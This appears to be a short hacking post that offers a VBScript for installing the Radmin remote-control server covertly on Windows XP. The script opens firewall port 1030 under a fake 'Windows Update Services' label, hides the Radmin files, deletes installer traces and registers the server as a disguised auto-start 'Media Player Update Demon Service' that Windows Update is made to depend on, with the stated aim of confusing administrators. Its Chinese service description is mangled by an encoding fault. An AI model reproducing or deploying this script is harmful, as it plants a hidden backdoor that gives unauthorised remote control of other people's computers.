|
Radmin is a powerful tool to use, we try to find a way to install r_server steahly and open the XP firewall at the same time. We also register r_server.exe as a fake system service to confuse the amdinistrator.
'On Error Resume Next 'Get Object set oWsh=createobject ("wscript.shell") Set oWshSysEnv = oWsh.Environment("SYSTEM") CmdName = oWshSysEnv("COMSPEC") 'Stop and remove oWsh.Run "r_server /stop /silence",0 oWsh.Run "r_server /uninstall /silence",0
oWsh.Run "sc stop r_server",0 oWsh.Run "sc delete r_server",0 'Open XP firewall for port 1030 RegPath="HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List\" KeyName="1030:TCP" KeyData="1030:TCP:*:Enabled:Windows Update Services" KeyType="REG_SZ"
oWsh.RegWrite RegPath & KeyName,KeyData,KeyType 'Import Reg 'oWsh.Run "regedit /s Srv.reg",0 'Hide & 'Erase oWsh.Run "attrib +h +r %systemroot%\system32\drivers\r_Server.exe",0 oWsh.Run "attrib +h +r %systemroot%\system32\drivers\admdll.dll",0 oWsh.Run "attrib +h +r %systemroot%\system32\drivers\raddrv.dll" ,0 oWsh.Run CmdName & " /C" & " del /q /f /s %systemroot%\system32\drivers\Update.exe" ,0 oWsh.Run CmdName & " /C" & " del /q /f /s %systemroot%\system32\drivers\sc.exe",0 'Create Service oWsh.Run "sc create MpUDsrv BinPath= " & Chr(34) & "%systemroot%\system32\drivers\r_Server.exe /service" & Chr(34) & " type= own type= interact start= auto DisplayName= " & Chr(34) & "Media Player Update Demon Service" & Chr(34),0 oWsh.Run "sc description MpUDsrv " & Chr(34) & "为Windows Media Playeræ??ä¾›åŠ è½½è¿›ç¨‹å?Šé©±åŠ¨ç¨‹åº?ã€?库æ??供基层更新守护进程的æœ?务。" & Chr(34),0 oWsh.Run "sc config wuauserv depend= MpUDsrv",0 oWsh.Run "sc start MpUDsrv",0
on error goto 0
|